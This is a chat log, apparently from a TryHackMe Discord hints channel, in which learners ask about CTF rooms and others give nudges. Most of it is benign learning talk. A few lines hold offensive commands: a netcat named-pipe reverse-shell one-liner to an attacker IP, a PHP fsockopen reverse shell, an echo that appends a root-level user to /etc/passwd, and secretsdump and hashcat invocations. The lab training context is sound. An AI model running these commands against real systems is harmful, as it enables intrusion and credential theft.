#room-hints

doesn't that one have browser control?

I managed the room with a single VPN session

it does yes

So the browser control isn't dependent on the VPN

yes, but the in browser Windows 10 box doesn't have RDP

you are the default user in that session and that's it you can't log out and log in as someone else, I've even tried runas and the works, nothing

Windows ships with an RDP client

Connect to the VPN, use the VPN IP and RDP in with the admin creds

mind if I dm?

oh boy do I feel dumb....

lmao thanks bro, I appreciate you. I've been on tryhackme since 9AM so my brain is fried I guess

is the password in exact format or do I need to loose the space?

The space?

No spaces in it

can I show you what I meqn via dm?

mean**

I guess

(I mixed 2 people up, there was spaces)

I'm trying to do the webappsec101 room and I'm having some trouble with finding the checkpassword page
I found on the /users/ directory there's a link to check_pass.php but when I try to go to ip/users/check_pass.php it tells me the page doesn't exist

@nimble onyx where on a website might someone want to "check password"?

doesn't this suggest it should be under users/check_pass.php?

@summer snow

maybe it 404s for GET requests

oh hmm

I tried every http action, no luck

hmm

I'm stumped ngl

is it possible the room is bugged?

Other people have had it working

still think my hint was a good one lol where on the website might you see or expect some function to check a password. Either way with web apps you should be going through all functionality to understand what it does if you do that.. you'll see it

i can maybe take a look later on but I need to test this first

ah I found it, I'm dumb...

though I'm still confused, why wasn't it under users/check_pass.php

it was there in the directory

if you look at the request you don't get a 403 or 401 but a 404 it's possible the reference is there but file doesn't exist. If you look at the right one that you found you can see it's not the same filename

gotcha

hello everyone , so im at the WebAppSec 101 room [Task 4] Authentication q3:
"What is the name of the cookie that can be manipulated? "
i got the username &password for admin account why cant i log in

with the admin credintials

@true gazelle Think of a way to browse cookies

@true gazelle Think of a way to browse cookies
@shrewd skiff

https://kb.iu.edu/d/ajfi

ive found the cookie acoording to the instructions on the above site,
but there is nothing matches to the answer

||https://imgur.com/mksTLDs.png||

have i got anything wrong?

@true gazelle you are asked to provide the "name" of the cookie. I would probably press F12 in the browser

i assumed it spouse to be "PHPSESSID" but its not

if i search thro the F12 bar
i can see the very same cookie that i took a pic of Earlier

@true gazelle look again 🙂

Think about that a cookie Can be described as more than just a cookie. This is hints so it’s a vague hint.

Hey, can someone confirm that i am missing something in the RP: Nessus room at task 4 question 9?

at the question i need to anwser this format

but the format does not match

is the webserver maby updated to a ..* version instead of ..**

nmap also gives the same output, could it be a bug?

are you looking into one of the listed vulnerabilities?

look at vulnerabilities

@compact crown ^^

@rancid crystal @white salmon Yes i am looking at the vuln's

well

i feel stupid 🙂

at some point we all do 🙂

There will be multiple vulnerabilities 22 in your case and one them contains your answer. I think you are looking at open ports scan atm?

Yes, i am looking at the vulnerabilities, but i looked into the HTTP issues instead of the apache HTTP issues 🙂

i was about to say look at apache lol

the answer was in the apache HTTP issues category xD

glad you got it

@white salmon @rancid crystal thanks for the help!

Hai

Hello, do you need something?

Anyone did the steel mountain on oscp path here?

Trying to figure out the powershell -c question

Hi guys, do someone is working on Jack's room? Stuck with the dictionnary, seems that we need to use another wordlist but I've tried somes without success...

Anyone did the steel mountain on oscp path here?
@slender totem Think how you can list services with native powershell command

@sand lark Try a few wordlists that are installed by default on Kali.

@slender totem yes what do you need?

nvm you found it already :)

@sand lark Try a few wordlists that are installed by default on Kali.
@tidal sedge Okay, will take a look with another than rockyou. Thanks!

@sand lark Please check rule #1 in #rules
Next time please don't pm me without permission. 🙂

Okay, sorry. That was just to thanks ^^

Introductory Networking, task 8, #6

there's no registrant adress

address*

i dont know what it's talking about

My guess

Would be that you didn't run the second scan

And are still looking at the first company @fossil cosmos

ok, thanks

Yeah, I've just checked -- that company definitely has a registrant address

Although you may need to read between the lines, given it splits it up into street, city, etc...

Hi guys, can anyone give me a hint for the "juiceshop"?

I'm trying task5.1, is it just a bruteforce? I can't seem to find any info about Jim

SQL Injection

I find ways to inject other requests, but not the reset method as written in the hint.

@hazy walrus if you're trying to reset Jim's password. Osint. Look at product reviews. Establish who Jim is.

Thanks @stuck fractal

@stuck fractal got it 👍

Linux Challenges, Task 4, #7. Please help.

I really have trouble understanding how to stack commands, espcially combining find with other things

@cedar path you can use regex

just use find and pipe to grep i think it should work

I'll try it again

@turbid bloom thank you!

okay so I don't get it, I do "find /" which searched the whole system then "| grep -e 4bceb" for the specific string of character I'm looking for. In my mind that means "search everything, all lines in all files, for this specific sequence of characters"

It does not

It means find every file, and search the titles for 4bceb

I was typing the whole explaination but it seems like Muir got it

Hehe 😛

:p

Muir understands my specific brand of stupid which I greatly appreciate

Muir is kind of person who can literally explain the things in the way you can get it by thinking it thoroughly once.

Aw ♥️

(Better hope that doesn't fail me. My job today is to figure out hashing algorithms, write one, and explain it in a blog post so that I don't drive anyone insane with this next room)

Ah, the one you mentioned few weeks ago.

Mhm

That's the one

I finally have time to implement it

So tempted to do it in Rust, just for the challenge.
That's my other job just now. Learn Rust 😁

Share the link or the implementation if it won't spoil the room, ofc.

Hehe, I'll share the blog post once I've got it written. I'm posting that publicly anyway 🤷‍♂️
The challenge in the room will be to understand how it all works, and purposefully break it anyway

wait before you go, let me pick thy brain. If my command as desciribed above is looking for the file using grep, i can find files using 'find' so grep is redundant

I'm assuming you're going to make it vulnerable on purpose, if you don't it'd be one hell of a challenge that I'd love to try.

@cedar path Correct, yes 🙂

@night cave Ooh, that's an idea actually.
The challenge is going to be building the algorithm, and deliberately changing a few lines to make it a completely different output

The output will be a password in the room

Should require total understanding of the function to do it

Curious.

I wasn't going to write a post on it originally, but honestly, this thing is turning my brain into mush, and I like maths

Enjoying your Merkle Damgard constructions? @inland onyx

So, in english, what's the stack of commands to solve this :

Find flag 26 by searching the all files for a string that begins with 4bceb and is 32 characters long.

I used the 'strings' command in an earlier problem but that time I had a specific file to search through. I think it's a stretch to search the entire system for this specific line of characters

Dude, as much as I love reverse engineering and the code analysis I enjoy learning the implementationa of hashes, I think I'll love that challenge :D

@stuck fractal Let's not even go there 🤣

@cedar path The question changed, but the location of the file didn't because that's a part of the VM which is a little harder to change

i'm doing the attacktive directory room and i'm stuck on task 7. i'm confused on what it means by what method and i can't get the secretsdump script to work. error:

[-] RemoteOperations failed: [Errno Connection error (spookysec.local/:445)] [Errno -2] Name or service not known
[*] Cleaning up... 

Is it asking me to find flag 26 and then search the contents using what I learned earlier?

Name or service not known... I think it wants a protocol in front of spookysec.local?

@digital iris I think you need to specify -dc-ip

@tidal sedge yeah i have that in the command

this is my command ||secretsdump.py -just-dc -dc-ip 10.10.176.9 backup@spookysec.local||

Find all files in the /usr/bin directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format)
my submision: find /usr/bin -type f -perm 4000 -name root. why is this worng

wrong*

@graceful nacelle Use symbolic format.

ugo doesnt have super users

Find / -type f -perm -4000 -xdev 2>/dev/null

Is what I use

@graceful nacelle No, but symbolic can

And it's techically u because it's related to owner

Oh wait my bad didn’t realise it was a room question 😂 should have looked 🤷‍♂️

find /usr/bin -type f -perm -u=s -name root.....smh its wrong

Correct

You're looking for binaries files with SUID called root

lmao

find /usr/bin -type f -perm -u=s -name root.....smh its wrong
@graceful nacelle I believe you want instead of "-name" use "-user"

i get so frsutated sometimes...

we all do

alright well i just finshed the "find command" course. Now im pretty confident itll help me with task 33 in "LL".

as always thank you for the help

congrats @graceful nacelle once you get to last question of "LL" feel free to give me a hint. 😄 I am still strugling with it

i feel it man haha wish me luck

Something must be wrong, all is given just 'IP address'. No 'User Name', no 'Password'. How am I expected to get into the machine????????

...

You are kidding, right?

@shadow basin I sure hope you're kidding

Small reminder. This is a hacking site 😁
How do you think you're meant to get into the machine?

yeah.. I thought it was satire....

all good I think I found the way.

so it was a real question?

@peak girder thats what came to mind firstly. Then I remembered this channels sincere sentiment "Try Harder" and since then all went "goot".

It's not a meme in this channel

It's a sincere sentiment that exists in infosec

should be a life sentiment :p

/etc/shiba/shiba4
find: ‘/etc/polkit-1/localauthority’: Permission denied
find: ‘/etc/ssl/private’: Permission denied
find: ‘/home/shiba1/.gnupg’: Permission denied
find: ‘/home/shiba1/.local/share’: Permission denied
find: ‘/home/shiba1/.cache’: Permission denied
/home/shiba4
/home/shiba4/.profile
/home/shiba4/.bashrc
/home/shiba4/.bash_logout
find: ‘/home/nootnoot/.gnupg’: Permission denied
find: ‘/home/nootnoot/.local/share’: Permission denied
find: ‘/home/nootnoot/.cache’: Permission denied
find: ‘/home/shiba2/.local/share’: Permission denied
find: ‘/lost+found’: Permission denied
/opt/secret/shiba4
If i exacuted the binanry corectly the password would be displayed in this giant list wouldnt it?

No

ok

You can a find command

Find finds things

@graceful nacelle this list is the result of "find" command. *"Permission denied" - means you dont have permission to search in those locations. Try redirect it with by adding "2>/dev/null" result of find command will look nicer. 😉

but wouldnt find pull up te same results?

well nm that actually why i didnt use find

Find doesn't run the binary for you though

I think #room-hints should be divided by user levels. For example: "easy", "medium", "hard"

#522158404614225920

or #544951750801752079

/home/shiba3/home/test
this seems redundant. why am i being asked to make home directory for test

That one is bugged

And that's not what you're bing asked

And that's not how you do it either.

@graceful nacelle I had same problem.

it could have just been left alone fromthe start?

there's a directory called test in your home directory That's what it's testing for

Your home directory is a special file path in Linux

/home/yourUserName normally, with exceptions

@graceful nacelle in linux terminology when they speak "your home directory" they mean your "/home/username" directory. Not your "/home/username/home" directory.

@graceful nacelle use cd ~ it'll go to your home directory

after that use pwd so you'll know where you are

^

(sometimes it's just easier to see it than it being explained)

@peak girder Also, cd on it's own will take you home.

One that people don't tend to know or use

yeah i really kept wondering how creating a home dir was benefical.

a home directory is created on making a user... normally

a home directory doesn't have to be named home

home directory is just whatever the default directory is set too - which is why root's home directory is /root and not /home/root

woah woah woah.. @steady stratus don't explain him the leet stuff...

lmao 😛

@peak girder Also, cd on it's own will take you home.
@stuck fractal yeah I don't use that because it tends to get stuck in muscle memory and I keep doing it unnecessary. Plus.. if you'd explain that to a new user they tend to think that's only used for getting to your home directory :p

:^

I always forget of cd tbf

just muscle memory

just muscle memory
@steady stratus it's annoying because i'll be going to my home directory for like.. 5 times every 2 minutes :p

hehehe yup!

alright now i gotta figure out how to remove a file thats tno empty

*not

also now we're on the track of cd, cd - is a great one to switch between directories 😄

cd ../ then cd ../ > cd ../../ as well lmao

oof

cd .. works too

I always append a /

yup lmao

@graceful nacelle try and google! maybe read up on linux in general

oh yeah lol

sounds like Linux is not an OS you often use --> https://sushant747.gitbooks.io/total-oscp-guide/basics_of_linux.html maybe this'll help

donig these kinds of things is most of the times: "reading, reading, reading, trying that one thing, reading, reading, reading"

barely even a month into linux atm

maybe try bandit from https://overthewire.org/wargames/bandit/

It'll teach you A LOT about linux.. if you're going to do those, you can DM me anytime with questions and I'll give you hints on it 😉

hell,... you can even have my old notes on the rooms (I'll take out the keys 😉 )

whoa that looks awesome

thanks man 🙂

@graceful nacelle great! tell me if you need anything for that!

its gonna be a minute, i really wanna solve the current task at hand or else i wont be abke to focus on anything else

bandit is fantastic really struggled with the last few but learned a lot and the rooms here really on linux solidified my knowledge and level of comfort with linux. Might have to do underthewire I don't know how to do anything on powershell. I know there's a room here i'll have to do aswell

anyone has done the final challenge of intro to python? i'm stuck

What's up with it?

i'm trying to use 5 times the function b64decode, thn 5 times b32decode and then 5 times b16decode. with for loops

but doesnt work

I have a sneaky suspicion you've got that the wrong way around. Can't remember, one sec

he says its been encoded using base 16, then base 32, then base 64

so to decode i normally should start from the end

Yep, sorry, that's my memory acting up

but the coded string in the file doesnt look like base64, thats weird

You're on the right track -- I can't really do much more in #room-hints; you're on the right lines with decoding five times each, just remember to save the result each time

@sharp bolt Also, it might have been encoded the other way

as in outer layer is 16

That was my memory too

But the task indicates it is that way around

Yeah the task is misleading

Can you paste the string here @sharp bolt -- I can't be bothered downloading the file

its over 2000 caracters

Dang

but basically it looks like that 343333333433333333333333333333333433333334

hello everyone

im kinda stuck on a learn linux room

when i enter cat alone i get like prompted underneath and can't find a way to get out

on the putty remote machine that is

Don't type cat alone

Control C

thanks that saved me lol

@inland onyx Outer layer is indeed 16

I just completed the room

Blugh, yes, it is indeed

I've just done it too

That.. could be worded better

i tried starting with b16decode but i get a python error

That's on you

Works fine here

Same ^^

woah

ok at least i have faith

thnks

That is an ouch 😆

i manage to decode the base16

just finsihed task 33.... the password actually made me lol

Great! @sharp bolt and @graceful nacelle

got the flag

thanks for your help @inland onyx

For basic pen testing room, any hints on how to find valid user? I’ve used enum4linux, nmap smb-enum-users script and rcpclient enumdomusers

Try enumerating manually

With smbclient?

This is hints. I gave you a hint

Thank you I’ll try it

Omg I found it what a good hint😂

Investigating Windows: #10 tried every date

I got all the question except this one, I looked at event logs and file dates.

Got it

Good morning.

I wanted to ask a hint for jackinthebox but I clicked hint and found the flag. However can I elevate privilages to root in this?

I only managed to get the flag

I know for one that in OSCP you need to be root not just fetch the flag

I was trying to crack the hash yesterday but no dice

@tawdry dove there are two rooms that responds to the word "jack".. which of them is it?

jackofalltrades not jakonthebox

My bad

i'll check my notes on that, @tawdry dove

you need privilege escalation, right?

I just wondered if anybody did it

I did

So the hint is:
Find a SUID which allows you to read files or operate with them

just list ALL the SUID files and it'll be pretty obvious on which one you should use

Hello!
I think I need a hint on basicpentestingjt
I'm at the 3rd question, and i don't know how to find the domain name of the server to use dirbuster ?
Did i miss something ?

you mean #3? @main mantle

Yeah

This one

I ran the nmap, and i've come to this : Discovered open port 139/tcp Discovered open port 445/tcp Discovered open port 80/tcp Discovered open port 22/tcp

maybe try running another buster?

@main mantle Directory brute-force port 80

what you wanna find is a directory

in the webpage

I'll be right back

Thanks i think it's alright!

@glossy basin I completed the task. I got the flag but I nevr got root

That's what i was asking

oh

in this room you are not supposed to get root privs

just the flag

https://gtfobins.github.io/gtfobins/strings/#sudo <-- read this
@tawdry dove

it basically shows that you can only use it for accessing the file system

Hey 🙂 I could need a little nudge for "Tempus Fugit Durius". Got access, found some interesting things and can login into another service. But when I want to choose a mode, it doesn't work 🤔

Think I just jumped in the biggest of rabbit holes @ Tempus Fugit Durius

hey guys, can anyone help me out. im on the common linus priesc room and stuck on task 9;

#4

Now we're inside tmp, let's create an imitation executable. The format for what we want to do is:

echo "[whatever command we want to run]" > [name of the executable we're imitating]

What would the command look like to open a bash shell, writing to a file with the name of the executable we're imitating

@proud cloud the echo "text" > file means you'll put the string "text" into a file called 'file', does that help a bit?

you can append with >>

look here: http://www.penguintutor.com/linux/command-basics-reference and esp. look at: Redirecting Standard Output (stdout) >

thank you ill have a read through that now

hope it helps

Hello there! Im doing Ignite room (https://tryhackme.com/room/ignite).
There is a RCE bug in this Fuel CMS, i can try run commands like ls, but i cant create a reverse shell. I tried with
running python and php interpreter, but i didnt manage to get connection. When i look into "ps aux", i cant
see that my reverse shell are running (no permissions to php/python/bash?). I tried to setup reverse shell
in php file instead. I created one:

-rw-r--r-- 1 root     root       163 Jul 26  2019 .htaccess
-rwxrwxrwx 1 root     root      1427 Jul 26  2019 README.md
drwxrwxrwx 9 root     root      4096 Jul 26  2019 assets
-rwxrwxrwx 1 root     root       193 Jul 26  2019 composer.json
-rwxrwxrwx 1 root     root      6502 Jul 26  2019 contributing.md
drwxrwxrwx 9 root     root      4096 Jul 26  2019 fuel
-rwxrwxrwx 1 root     root     11802 Jul 26  2019 index.php
-rwxrwxrwx 1 root     root        30 Jul 26  2019 robots.txt
-rw-r--r-- 1 www-data www-data     0 May  2 06:07 test.php

But i actually cant write into it:
echo '$sock=fsockopen("10.9.0.0",444);exec("/bin/sh -i <&3 >&3 2>&3");' >> test.php
How is that possible? I have file perm to do it ? Can someone give me a hint, of
what should i do?

@rapid flower Just use netcat to get a shell, you're over complicating things.
Or alternatively you could use this:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Tunnel IP> 4444 >/tmp/f

(Well worth reading up on that as well)

Thank you! I will try this up~

Running normally nc didn't helped, but this long solved everything.
Thanks @tidal sedge

You're welcome 🙂

need a little help on the 2nd challenge of the scripting room

do i understand correctly that my sripts needs to wait for port 1337 to be open as a starting point

and once it is, it needs to send it 0 as a first number

@sharp bolt just try it! you'll find out soon enough

“The Cod Caper -Try Hack Me (Writeup)” by Govind Sharma https://link.medium.com/ZFMFX1pP45

(Submit it on the room -- not here @shy sinew 🙂)

@wooden mist Can I DM you about the ConvertMyVideo challenge?

I have submitted it on the room but it is shown in the writeup section yet @inland onyx

The room author (muirl in this case) has to accept it before it is added as a writeup 🙂

it will be after the owner approves it

Huh?

That's a Pars room

oh it is?

whoops

Speaking of Pars

Where the heck is he?

@vernal ridge i'd prefer not as the room was just released

oh okay

Someone online I can ask a yay/nah question about Tempus Fugit Durius?

I don't know how far you've gotten on that machine, but maybe I can answer you, @pine ermine

any1 done ctf100 task 74? cant seem to find the password

@pine ermine I can answer. I think 🙂

@hot skiff could you give me a hint for flag 2? I think I enumerated everything multiple times and getting crazy 😂

@white pike You usually scroll right past this bit when examining LinEnum output. At least I often do.

Hahah thanks @hot skiff - I’ve got confirmation I was deep into a rabbit hole. I’m trying harder as we speak. Hope to find something soon!

Any hints for the convertmyvideo room? I've been stuck for a while

same here, stuck on privesc if anybody feels like giving a nudge (convertmyvideo)

I tested it, so I can't really give much here

I will suggest not over thinking it though

It's comparatively a simple privesc

hmm okay thanks.. I may be overlooking something

hey @nocturne vault can you give me a little nudge on getting a foothold on the box (convertmyvideo)? found the hidden dir but cant find a username

sure DM me

Could I ping something off somebody about Tempus please? I think I might be deep in a rabbit hole but not sure 😄

@wraith marsh Please keep the imagery PG13

Sorry 😩

can someone give me a hint for 25days of christmas task 10 question 2?

Task 10 or day 10?

task

Be a stalker.

Hunt Lola down

Everywhere

just noticed there's a resources link i'll check that out just can't find her actual occupation and no linkedin from what I saw aha found an archived page with an official occupation title sorta listed but that wasn't right. I'll keep checking stuff 👍

ugh I saw it, tried it but it said incorrect should've copied and pasted or made sure I was typing it correctly lol

what is wrong in this??

What if you're in the owner's group?

u mean i should write 664

@scarlet plinth You're in the hints channel. I gave you a hint, something to think about.

ok

Hi guys, https://tryhackme.com/room/juiceshop Task[5] #1, any hints on where should i look for more info on Jim?

@frail hull OSINT

Start with product reviews

@stuck fractal ok, thanks

Man I cannot get a foothold on convertmyvideo, any dm nudges would be appreciated. I am serving it files but not sure where to get my foothold

nvm I think I'm on the right path

is there a reason smb1 is disabled on the Active directory box? i need to access it with smbclient and i have the password but its disabled it says . i need a file in there

@graceful sun because SMB1 is deprecated and insecure?

RDP in

it says Using utility can we map remote SMB shares? then asks to grab a file with it. i still rdp in?

and its smbclient. so i figured thats what it was. i just wanna make sure we are thinking of the same thing.

its this box https://tryhackme.com/room/attacktivedirectory

task 6 #5

shit there is walkthroughs , sorry . dont wanna waist anyone times when there is lol my bad

There are a few write ups under the writeups

🙂

yea lol suhh

@graceful sun SMBClient will do more than smbv1

gotcha. and like on the walkthrew its showing on his smbmap the shares and whats in the files i do the same command but i only get the share names not the contents do you knwo why that might be

@graceful sun smbmap doesn't give you the contents of files

odd. his did https://fr33s0ul.tech/attacktive-directory-thm-write-up/ well thats good to know

@graceful sun Nope.

whats all those files under the shares that i didnt get on his smbmap? just wanna know so i learn not doubting you

That's the files on the share

lol sorry i been looking at the writeup as little as possible so i didnt see that haha

[-] RemoteOperations failed: [Errno Connection error (spookysec.local:445)] timed out
sorry so now i got the passwd but im getting this.

doing the same thing in the write-up

i wonder if my metasploit is still runnung and blocking it or something

nope

im gonna stop now.... it expired and didnt tell me .... lol

the problem is still there tho. wth

wow, i got it now...

When sending data over TCP, what would you call the "bite-sized" pieces of data

what does this mean ?? and answer plaese

re-read the text before the questions all the answers are there

also don't spam multiple rooms with the same question

Hello all

any hint on convert my video? I cannot find a username

In yearoftherabbit I found this
What could this be?

||+++++ ++++[||

Some kind of code

Found it.

Hi all

I need a little help on https://tryhackme.com/room/tempusfugitdurius. Can anyone ping me pls?

Hi everyone. I'm doing the "ConvertMyVideo" room but i can't find the user(task2). Can anyone give me a hint on what i am supposed to do?

Hello, I am doing the "Agent Sudo" room. I can't get any progress on it, can anybody please give a hint.
Here is what I have tried:

I think it has something to do with the User-Agent field of a http request. So I replace the value of the field with "sudo" cuz the challenge name is agent sudo.
I tried to connect to ftp using anonymous but didn't work.
I tried the metasploit module for "ssh user enun". I got a username and tried to put the username in the User-Agent field.
I tried brute forcing ssh using hydra with the username I got.

Please help, what I am missing.

@lament yacht sorry did you specify at which task you at?

At the first one.

@lament yacht And what is exactly your hazard? What the task asks, and at what you are strugling?

@smith3301
It is Task 2
Question: How do you redirect to the secret page?
Question: What is the agent name?
I got one username by "enumerating ssh for username" but it is not working. So I am stuck at this point. Can't get any progress.

@lament yacht Have you enumerated the web page?

@heady pulsar
I tried gobuster with the medium list. But it got to 30% with no progress so I stopped.

@heady pulsar
I will try it again.

@lament yacht Sounds good. if you're not having luck with a medium list, try a big list or a different one 🙂

@heady pulsar Ok. Thank you very much.

good luck. One of the methods you tried (listed early) will lead you further in

Hey. A hint for privilege escalation on yearoftherabbit?

Nothing pops out

I tried some paths but no dice

do the other rooms by @inland onyx, @tawdry dove you will know afterwards

soz for the ping

^^ this

Ha! Thanks . Never thought that program could be vulnerable 😄

anyone done ConvertMyVideo room ?

@steady stratus may I PM you and ask if I'm on the right track of PE in Tempus?

Hi! I'm doing the common linux privesc room and I need to create a new user with root privileges (task 6 question 5). I can write to /etc/passwd. I created a password hash with ||openssl passwd -1 -salt new 123|| and did ||echo new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash >> /etc/passwd|| but I can't su new with password 123, it says authentication failure. if I look in /etc/passwd it shows new::0:0:root:/root:/bin/bash (no x for password). Am I missing something?

normally where do linux stored the hashes?

etc/shadow?

I guess you need to use single quotes on your echo statement. So echo '...' >> /etc/passwd

Otherwise the special characters will screw things up

quotes worked thanks

Hi everyone. I'm doing the "ConvertMyVideo" room but i can't find the user(task2). Can anyone give me a hint on what i am supposed to do?

Hi all! BP-Volatility Task4#3. I've uploaded the infected files to hybrid-analysis.com but I can't see the name of the malware to answer the question; i.e. a name that has 6 characters.

@marble bridge You will find the user when you figure out how to exploit the Converter.

Where would a HTTP Auth (basic auth) users creds be stored?

I'm having trouble with Q5 of task 2 of intro researching. pls help

@queen torrent https://hashcat.net/wiki/doku.php?id=example_hashes

thxs for the help

(That might not be the best way to encourage researching @white salmon 🙂)

I know

It is literally a room teaching people how to research.

is there a way to make the hashes cracking faster?

Try not to spoil that?

He says

Watching Swafox do it too..

@outer meteor GPU (CUDA)

is there a way to make the hashes cracking faster?
@outer meteor have an expensive PC

😆

rip

i'm sad right now

it's in 0,01%

it might take a year

what are you trying to crack

and how

i'm doing the crackthehash room

and I'm using hashcat

ok with raspberry or with gpu?

what?

raspberry?

raspberry pi

i'm in a VM

this is bad

what do u mean

the windows version is better

then why did i install in a VM

that doesn't make sense

for everything else

isn't it easier just to put the OS in an external hdd

?

no i personally have a laptop with linux

I have it in VM and its just fine

how do u crack passwords then?

i mean for THM porpous. Are you doing Brute force with or without wordlist?

with

if I have a hash to crack, I copy it to windows because I have a 1080 TI there

which wordlist are you using?

rockyou.txt (idk other wordlists)

so, there is nothing to worry about. Untill now, i didnt need much time to make the attack. Up to 15% so far

but mine was running for like 30 min and got 0.02% :/

WOW, thats so slow

ahaaha

do you have gpu?

of course

but it's crap

well, use hashcat in host then

It's a nvidia 940mx

should be better than that number

yeah but how do i use it?

CUDA

pass the hash to your host with any tool. Even you can use drive to upload the file and download with the host

then use cuda

like kobims says

@outer meteor download hashcat on windows, open powershell

I think my pc will explode if i do that with the VM open

xD

xD

hey, what kind of wordlist should i use to make an "extension" attack with burpsuit

?

@outer meteor nope.

VM doesn't really use GPU

I'll try then

@grand pivotmake your own you probably don't need as many anyway

which one do i download binaries or sources?

Well. What's source code?

And what are binaries?

http://developer.download.nvidia.com/compute/cuda/10.2/Prod/network_installers/cuda_10.2.89_win10_network.exe

Idk

@white salmon No.

I'm dumb

Nvidia drivers come with cuda stuff @white salmon

ty

Gaming laptop, it will have cuda working

@outer meteor source code is the raw program before it's been compiled

You don't want to have to compile it.

ohh ok

thx

Binaries are compiled code

ty :)

I have a problem here: Hacking with Powershell[Task 3][#3]I have tried:||Get-Command | measure = 7935|| but it is not accepted can someone help me ?

That doesn't correctly filter.

You need the number of cmdlets

another thing do i need any wordlist to get the cracked password?

because it didn't work

ok

@outer meteor what do you mean ?

this

send the command

hashcat64.exe -m3200 -a0 -o cracked.txt hash.txt

You stopped it earlier

And sorry, what

Those arguments

Talk me through them.

Mode is bcrypt

-a0 is redundant, don't need it

What's the two txts?

hash.txt is the hash and the other is where the cracked password is going to

Don't do that

where is the wordlist ?

You need to give it a word list otherwise it expects input from stdin

@white salmon i was thinking about that xD

It's bcrypt, it's also gonna take a while to crack

Just so you know

hashcat64 -m 3200 hash.txt rockyou.txt

but i need to download the rockyou.txt

-O (capital o) for optimised

Yes

Google "rockyou.txt" and click the brandon orsey naive-hashcat one

Put it in the folder

i can run this command then : hashcat64.exe -m3200 -O cracked.txt rockyou.txt

hello

hi

@outer meteor nope, you're missing something

-m 3200

And also capital O is different to -o

hashcat -m mode hash wordlist -O

you dont need cracked.txt

jesus christ

so much information

so i can do

hashcat -m 3200 hash.txt rockyou.txt -O

?

yes

and the -O makes it faster?

because the other guy said optimised

Yes.

gonna try it now

It doesn't make it faster for all hashes, but it won't make it slower for those ones

It will take a long time

Even on my GTX 980, it takes a long time

i mean it's only one password

Yea

But it's bcrypt

It's designed to be a pain to crack

i've just remembered my gpu only has 2gb of vram

ffffffff

Doesn't matter

really?

vram is not the same as speed

just start it and wait

sry for being this dumb

If the hashing algorithm needs more VRAM, hashcat will tell you

i feel bad for asking u guys a lot of this stuff

@white salmon i saw that ahaah

it's alright

what happens when it finds the password

it stops?

it blows up

SHIT

@outer meteor DW, you'll probably be cracking for another decade or so

yeah

this one is gonna take a decade

Bcrypt was specifically designed to be about as fast on a graphics card as it is on a CPU

rip

I've gotta ask a new pc for this

940MX is showing it's age now

yup

the problem is that my parents won't buy it so

Learn more hacking -> Start making boxes for TryHackMe -> Make commissioned boxes -> buy PC

hmm

that seems like a good idea

have u done that before?

I currently do

could u tell me some rooms you've made?

https://tryhackme.com/p/NinjaJc01

And some KoTH boxes

Does someone know why this would happen?
I started a simple nc listener and am receiving a (reverse shell) connection, but it's completely onresponsive. I tried python, bash, etc, all I am getting is:

nc -lvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.168.15 38827 received!
ls

Some sort of firewall on the box?

Reverse shells are designed to get around that

Yea

What box?

Tempus Fugit Durios

Can't really help then

I want to start making boxes so I can eventually make commissioned boxes and on the thm creators program but I’m not confident in making boxes I can make all kinds of osint, crypto, and stego challenges but I need to practice making boxes

Just do it for fun to start with

Allright, sorry - did get a responsive shell now. Nevermind me :p

I stoped the cracker because it can't do nothing

my gpu is too slow

it was on 0.11%

not even 1%

@outer meteor So you can use your brain to speed it up a bit

;(

You know the length of the password, and you know it's in rockyou

Why not filter rockyou to only 4chars?

bruh

forgot that

still

it probably will take a lot of time

Much less time

yeah but with my gpu it will be the same thing

Not really

it will take a day probably

Reducing the amount of passwords it has to try will reduce the amount of time it'll take to crack it

can u tell me then what do i put in the command?

Huh?

how do i put 4 chars?

also if i brute-force will it be faster?

You have to filter the wordlist

Basically making a new wordlist

Brute force, you don't know what characters are in it so it's (26+26+10) for a-zA-Z0-9 and then that ^4

That's 14million possibilities

Same as rockyou, roughly

ok

i need help to filter the file

https://tools.kali.org/password-attacks/hydra

pw-inspector in kali

the room steel mountain, what cve is it expecting? i found couple and it won't accept...any of it

Well what did you exploit to gain access?

Go from there.

yeah, thinking of this 1: https://www.exploit-db.com/exploits/39161

but it won't accept my anwsers

CVE number

so not CVE-6969-6969

just the 6969-6969

damn, feel stupid now. i thought i tried any combination already, also that one. tried it again...it works. thanks ..

Answer format.

Count the little * to confirm in the future.

hey guys how do download a smb share

Rule 13

aight

i did

Then you didn't google it right

i m goign to do it again

You don't mean download a share.

You want to access a share and download files

You can't download a share

A share is not a file

thanks

i ll read more into it

@stuck fractal dude is there a command to run hashcat with the gpu, or is it already using the gpu?

It already does by default

John uses CPU unless you compile it for OpenCL

because when i go to task manager it wasn't using any of the gpu power

I think you can do something like -D 1 or whatever the device ID is to switch hashcat to cpu

but when i go to task manager it's not using any gpu power

it's in 0%

Printscreen your hashcat powershell window

this is the location

now i'm gonna run the command

I said the window...

Powershell > CMD for this btw

For anything...

you mean i have to do it in powershell not in cmd

Have to is a bit strong

now i got confused

You can use CMD but CMD is worse than powershell in general

then I'll try with powershell

there it goes

It's using it

But you're cracking bcrypt

no sense

it's using memory and cpu only

otherwise it would show up in the task manager

It's using the GPU.

Then i need an explanation

Just accept it and move on

It's going to use the CPU for coordinating stuff

I still need to filter this wordlist

It ain't gonna be any faster than using your CPU though most likely

press s and tell me your speed

5 H/s

from what i've read the bcrypt isn't GPU friendly

time estimated 31 days

ahaha

You aint gonna crack it at that speed

I get 100H/s CPU or GPU

but why is my speed so slow

my pc ain't that bad

(i think)

It's a 940mx

That GPU is slower than a 750ti

it's a laptop's GPU

F

Laptop GPU doesn't mean slow

940MX does mean slow.

but can't the cpu like "help"

You're cracking on the GPU

Cracking on that CPU should be faster

Download John Jumbo

(This advice applies only to bcrypt)

Doesn't work in hashcat with cpu then?

I've only seen ways to do that on Linux

i think if you use -D 1 you'll use the cpu

IDK how you'd do it on windows

@red minnow No

iGPU

I'll search if there is a way

Download john

Use john

much quicker

remembered something tho

didn't @white salmon sent a link of cuda to download?

Yeah but that was wrong

Nvidia drivers come with it

It wouldn't work at all if you didn't have it set up right

ok

I have a problem with cc pentesting

For the hidden file

I enumerated them all with gobuster but no one works

i think you use gobuster that gives like 4,5 results and one of those is the hidden directory

That's what I did

@novel jackal What's your full command?

any idea how i can check my OpenCL version on windows 10?

gobuster dir --url <ip> -x xxa --wordlist big.txt

